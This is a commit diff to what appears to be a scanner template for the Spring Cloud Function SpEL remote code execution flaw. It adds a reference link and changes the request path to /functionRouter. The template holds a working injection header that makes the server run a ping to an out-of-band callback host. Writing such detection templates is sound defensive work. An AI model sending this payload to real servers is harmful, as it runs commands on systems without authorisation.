additional reference + path update

--- a/vulnerabilities/springcloud/springcloud-function-spel-rce.yaml
+++ b/vulnerabilities/springcloud/springcloud-function-spel-rce.yaml
@@ -7,12 +7,13 @@ info:
   reference:
     - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
     - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
+    - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
   tags: springcloud,rce
 
 requests:
   - raw:
       - |
-        POST /{{rand_base(8)}} HTTP/1.1
+        POST /functionRouter HTTP/1.1
         Host: {{Hostname}}
         spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
         Content-Type: application/x-www-form-urlencoded
